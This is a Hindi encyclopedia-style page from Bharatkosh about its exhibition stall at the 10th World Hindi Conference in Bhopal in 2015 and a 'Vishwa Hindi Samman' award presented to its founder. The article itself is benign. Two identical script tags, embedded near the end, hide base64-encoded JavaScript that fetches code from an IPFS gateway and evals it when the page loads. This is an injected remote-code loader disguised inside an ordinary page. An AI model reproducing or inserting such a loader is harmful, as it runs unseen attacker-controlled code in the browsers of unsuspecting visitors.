दसवें विश्व हिन्दी सम्मेलन में भारतकोश की प्रदर्शनी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
भारतकोश संस्थापक श्री आदित्य चौधरी, माननीय गृहमंत्री श्री राजनाथ सिंह द्वारा 'विश्व हिन्दी सम्मान' से सम्मानित होते हुए

दसवाँ विश्व हिन्दी सम्मेलन वर्ष 2015 में 10 सितम्बर से 12 सितम्बर तक भारत में मध्य प्रदेश की राजधानी भोपाल में आयोजित हुआ। इस दसवें सम्मेलन का मुख्य विषय था- "हिन्दी जगत् : विस्तार एवं सम्भावनाएँ।" विश्व हिन्दी सम्मेलन सन 1975 से विश्व के विभिन्न देशों में आयोजित किए जाते रहे हैं। सन 2015 में दसवें विश्व हिन्दी सम्मेलन का आयोजन 10 से 12 सितंबर तक भारत में मध्य प्रदेश के भोपाल शहर में हुआ। इस सम्मेलन में हिन्दी के प्रचार-प्रसार में योगदान करने वाली कई देशी-विदेशी कंपनी एवं संस्थाओं की प्रदर्शनी भी लगी। विदेशी कंपनियाँ जैसे- गूगल, एप्पल, माइक्रोसोफ़्ट, वेबदुनिया हिन्दी के साथ-साथ भारतीय संस्थाएँ जैसे- सी-डेक, केन्द्रीय हिन्दी संस्थान, भारतकोश, राष्ट्रीय विज्ञान प्रसार केन्द्र भी शामिल रहीं।

भारतकोश की प्रदर्शनी

दसवें विश्व हिन्दी सम्मेलन में ऑनलाइन हिन्दी प्रकाशन एवं हिन्दी टाइपिंग में योगदान देने के लिए विदेश मंत्रालय, भारत सरकार द्वारा भारतकोश (www.bharatkosh.org) को भी प्रदर्शनी लगाने का आमन्त्रण मिला। भारतकोश के पण्डाल (स्टॉल) को वहाँ आये देश-विदेश के हिन्दी प्रेमी एवं विद्वानों की टीम ने बहुत सराहा और भारतकोश के बारे में जानकारी ली। साथ ही साथ भारतकोश के बने फ़ोटोफ़्रेम पर जमकर अपने फ़ोटो खिचवाये।

भारतकोश संस्थापक श्री आदित्य चौधरी जी को 'विश्व हिन्दी सम्मान'

भारतकोश संस्थापक श्री आदित्य चौधरी जी को दसवें विश्व हिन्दी सम्मेलन में भारतकोश का ऑनलाइन प्रकाशन एवं छात्रों को नि:शुल्क कम्प्यूटर शिक्षा देने के लिए भारत सरकार के विदेश मंत्रालय द्वारा निमंत्रण मिला। भारत के माननीय गृहमंत्री श्री राजनाथ सिंह ने 12 सितम्बर, 2015 को आदित्य चौधरी जी को 'विश्व हिन्दी सम्मान' से सम्मानित किया।

विश्व हिन्दी सम्मेलन में भारतकोश की स्टॉल (पण्डाल) में आये विशिष्ट अतिथि
दिनांक- 9 सितम्बर, 2015 को भारतकोश पण्डाल पर आये अतिथि


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>